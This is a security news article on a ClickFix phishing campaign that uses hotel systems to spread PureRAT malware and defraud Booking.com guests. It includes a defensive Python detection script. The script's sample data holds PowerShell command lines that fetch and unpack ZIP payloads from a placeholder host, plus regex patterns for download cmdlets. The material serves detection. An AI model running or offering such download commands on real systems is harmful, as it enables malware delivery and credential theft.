Sophisticated ClickFix Phishing Campaign Exploits Hotel Systems, Targets Booking.com Users with PureRAT Malware

A large-scale phishing campaign is actively targeting the global hospitality industry, exploiting hotel systems to deploy the PureRAT malware and ultimately compromise users of major booking platforms like Booking.com. The sophisticated attacks leverage a tactic known as ClickFix, tricking hotel staff into downloading malicious software that steals credentials. These stolen credentials are then used for further fraudulent activities, including direct attacks on hotel guests.

Key Takeaways

  • A widespread phishing campaign is targeting hotels globally.

  • The campaign uses the "ClickFix" social engineering tactic to deploy PureRAT malware.

  • Stolen hotel credentials are used to access booking platforms like Booking.com and Expedia.

  • Attackers then target hotel guests with fraudulent messages to steal financial information.

  • The operation has been active since at least April 2025 and shows signs of professionalization.

The Attack Chain: From Hotels to Guests

The cybercriminals initiate their operation by compromising hotel email accounts, which they then use to send spear-phishing emails that impersonate legitimate entities, such as Booking.com. The emails contain malicious links designed to redirect recipients to fake websites. These sites often present a deceptive "reCAPTCHA" challenge, a hallmark of the ClickFix tactic, which prompts users to execute malicious commands, typically PowerShell scripts.

Upon execution, these scripts download and install a ZIP archive containing PureRAT, a potent remote access trojan (RAT). PureRAT is equipped with a wide array of malicious capabilities, including remote control, keylogging, webcam and microphone capture, data exfiltration, and command execution. Its modular nature and protection against reverse engineering make it a formidable tool for cybercriminals.
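For defenders, the chain described above (a fake reCAPTCHA prompt, a user-run PowerShell command, a ZIP download) can be hunted in process-creation telemetry. The following triage sketch is an added example, not code from the cited research: the Sysmon-style field names, the signal list, the threshold, and the premise that a pasted command runs as a child of explorer.exe are assumptions, and the events are constructed.

```python
import re

# Constructed process-creation records (Sysmon Event ID 1 style fields), not real telemetry.
SAMPLE_EVENTS = [
    {"host": "FRONTDESK-01", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell -w hidden -c "iwr https://example.invalid/u.zip -OutFile '
                    r'$env:TEMP\u.zip; Expand-Archive $env:TEMP\u.zip" '
                    r'# I am not a robot - reCAPTCHA ID 0000'},
    {"host": "FRONTDESK-02", "ParentImage": r"C:\Windows\explorer.exe",  # interactive shell
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe"},
    {"host": "ADMIN-01", "ParentImage": r"C:\Windows\System32\svchost.exe",  # scheduled task
     "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "CommandLine": r"pwsh -File C:\Scripts\backup.ps1"},
    {"host": "RES-03", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -c Invoke-WebRequest -Uri "
                    "https://example.invalid/p.zip -OutFile p.zip"},
]

SHELLS = {"powershell.exe", "pwsh.exe"}

# Illustrative signals (assumptions, tune for your environment).
SIGNALS = {
    "download": re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|"
                           r"downloadfile|downloadstring|start-bitstransfer|curl)\b", re.I),
    "zip_archive": re.compile(r"\.zip\b|expand-archive", re.I),
    "hidden_window": re.compile(r"(?<!\w)-w\w*\s+h(idden)?\b", re.I),
    # Fake "verification" text appended as a comment so the pasted command looks harmless.
    "captcha_lure": re.compile(r"captcha|not a robot|verification", re.I),
}


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.lower().rsplit("\\", 1)[-1]


def triage(events, threshold=2):
    """Return (host, signals) for PowerShell children of explorer.exe with >= threshold signals."""
    findings = []
    for ev in events:
        if basename(ev["Image"]) not in SHELLS or basename(ev["ParentImage"]) != "explorer.exe":
            continue
        hits = sorted(name for name, rx in SIGNALS.items() if rx.search(ev["CommandLine"]))
        if len(hits) >= threshold:
            findings.append((ev["host"], hits))
    return findings


if __name__ == "__main__":
    for host, hits in triage(SAMPLE_EVENTS):
        print(f"{host}: {', '.join(hits)}")
```

Requiring two or more signals keeps a plain interactive PowerShell session (FRONTDESK-02) and service-launched scripts (ADMIN-01) out of the results.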

Exploiting Stolen Credentials for Fraud

Once the hotel systems are compromised and professional credentials for booking platforms like Booking.com and Expedia are stolen, the threat actors have two primary avenues for exploitation. They can sell these credentials on dark web forums, where they become a valuable commodity. Alternatively, they can leverage these credentials directly to send fraudulent communications to hotel guests.

These secondary attacks often involve contacting customers via email or messaging apps like WhatsApp, using legitimate reservation details to build trust. The attackers then fabricate security issues or verification problems related to bookings, urging guests to click on malicious links. These links lead to fake landing pages that mimic the appearance of legitimate booking sites, designed solely to harvest sensitive banking and payment card information.

Evolving Tactics and Professionalization

Researchers have noted that the ClickFix tactic itself is becoming increasingly sophisticated. Newer iterations of ClickFix pages incorporate elements like embedded videos, countdown timers, and OS-specific instructions to enhance their credibility and urgency. These pages are also becoming adept at automatically copying malicious code to the user's clipboard, a technique known as clipboard hijacking, which further streamlines the infection process.

The observed activity, which has been ongoing since at least April 2025 and was still active in early October 2025, demonstrates a high degree of organization and professionalization within the cybercrime ecosystem. Services for acquiring hotel administrator data and selling compromised account logs, together with the "malware-as-a-service" model for PureRAT, all contribute to lowering the barrier to entry for these sophisticated fraud schemes.
